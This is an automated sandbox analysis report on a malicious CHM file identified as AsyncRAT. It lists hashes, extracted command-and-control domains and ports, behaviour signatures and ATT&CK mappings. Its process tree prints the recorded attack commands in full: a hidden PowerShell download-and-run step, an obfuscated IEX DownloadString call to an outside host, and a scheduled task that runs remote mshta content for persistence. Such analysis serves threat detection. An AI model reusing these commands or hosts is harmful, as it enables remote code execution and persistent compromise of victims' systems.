Overview

overview

10

Static

static

1

83a1b442bf...06.chm

windows7-x64

1

83a1b442bf...06.chm

windows10-2004-x64

10

Analysis

  • max time kernel
    154s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-03-2023 13:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06.chm

  • Size

    190KB

  • MD5

    9d9a0a119044c6a83d533a1941bb64c5

  • SHA1

    279387ccf49c5f71c99f8b89b333be4a70f6cab6

  • SHA256

    83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06

  • SHA512

    31c4edbcff416df4cada81dbd1e3bdc752cb8a74c837787feba01d9e93e00970b15efac6bf70548b8ba1811cf7e7522bbd64cfe0572d5619759b8069b5b399b2

  • SSDEEP

    3072:Xg4C8YLEo5xuIvDocDWjc/pgDXQgKpacezvRBDobwrArHMp1G6/AirUIKX6MA:XpYIW0UY8pTxp/mjmqArYRQIKX5A

Score
10/10
asyncrat2023rat

Malware Config

Extracted

Family

asyncrat

Version

- By Dimas Rodrigues

Botnet

2023

C2

clsuplementos.ddns.net:1110

clsuplementos.ddns.net:2220

clsuplementos.ddns.net:3330

clsuplementos.ddns.net:4440

clsuplementos.ddns.net:5550

clsuplementos.ddns.net:6660

clsuplementos.ddns.net:7770

clsuplementos.ddns.net:8880

clsuplementos.ddns.net:9990

handling.ddns.net:1110

handling.ddns.net:2220

handling.ddns.net:3330

handling.ddns.net:4440

handling.ddns.net:5550

handling.ddns.net:6660

handling.ddns.net:7770

handling.ddns.net:8880

handling.ddns.net:9990
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Async RAT payload 1 IoCs
    rat
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden wget 'https://meubooking.com.br/2023/reservations.php?file=edce4301c8d01cf9b904be.html' -OutFile 'C:\Users\Public\win32.hta'; Start-Process 'C:\Users\Public\win32.hta'
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2344
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\win32.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command <#-------------#>$Ojbd='<#-------------#>IEX(N`e`w-Object Net.W';<#-------------#>$t2='ebClient).Downlo';<#-------------#>$t3='t4(''https://corpolevesuplementos.com.br/2022pws/assyncpws.jpg'')'.Replace('t4','adString');Sleep(5);IEX(<#-------------#>$Ojbd+<#-------------#>$t2+<#-------------#>$t3)
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3760
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            5⤵
              PID:4608
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start /min schtasks /create /sc MINUTE /mo 180 /tn "BfeOnServiceStartTypeChange{9E67695A-30C6-420C-9ACF-8734ABFB9710}" /tr "\"mshta\"https://corpolevesuplementos.com.br/2022pws/assdirect.html" /F
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4860
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc MINUTE /mo 180 /tn "BfeOnServiceStartTypeChange{9E67695A-30C6-420C-9ACF-8734ABFB9710}" /tr "\"mshta\"https://corpolevesuplementos.com.br/2022pws/assdirect.html" /F
              5⤵
              • Creates scheduled task(s)
              PID:2456

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      a9b53645ac136a73f0af2f791f716efd

      SHA1

      9917c3c61b029440dacd1b93a80700ce4afdfae8

      SHA256

      e9945e3f08483ef253189f405ad6ed0360649884e7ff534bbb233ba93fdd71d6

      SHA512

      a10d2e89faf9f76242edf38c88af522c7739402e158b7202566442bcbe78c84e7ff1c375a90c75bc396046e90a8a57dc24817a1a5ae524da148c1eef034962b9

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tyj52wf5.ci2.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Public\win32.hta
      Filesize

      254KB

      MD5

      9d447d72b85eca4c58a5b14dbb170e01

      SHA1

      9c39245d5b40e4815d006ce6fe402e7ec26e0045

      SHA256

      388e1f36d35dcbe4675821f4104514f66bcefdee33752acad874e45bdf44499a

      SHA512

      c7d9a77a78f1ee3dec93d288bbcd774f4667778970012cdbd4b0b0835ca29dc8717d9c90c07c79847e13483eb1057e039dae13777a33d1f157baa1d5e227c5f2

      Download Submit
    • memory/2344-146-0x00000276DBA40000-0x00000276DBA62000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2344-151-0x00000276DBAC0000-0x00000276DBAD0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2344-152-0x00000276DBAC0000-0x00000276DBAD0000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-159-0x0000000004A40000-0x0000000004A50000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-177-0x0000000007830000-0x0000000007EAA000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/3760-161-0x0000000005080000-0x00000000056A8000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/3760-162-0x0000000004FC0000-0x0000000004FE2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/3760-163-0x0000000005720000-0x0000000005786000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3760-164-0x0000000005940000-0x00000000059A6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/3760-158-0x00000000049C0000-0x00000000049F6000-memory.dmp
      Filesize

      216KB

      Download
    • memory/3760-175-0x0000000005FF0000-0x000000000600E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/3760-176-0x0000000004A40000-0x0000000004A50000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-160-0x0000000004A40000-0x0000000004A50000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-178-0x0000000006520000-0x000000000653A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/3760-179-0x0000000004A40000-0x0000000004A50000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-180-0x0000000004A40000-0x0000000004A50000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-181-0x0000000004A40000-0x0000000004A50000-memory.dmp
      Filesize

      64KB

      Download
    • memory/3760-182-0x0000000007680000-0x000000000771C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/4608-183-0x0000000000400000-0x0000000000416000-memory.dmp
      Filesize

      88KB

      Download
    • memory/4608-186-0x0000000003360000-0x0000000003370000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4608-187-0x0000000003360000-0x0000000003370000-memory.dmp
      Filesize

      64KB

      Download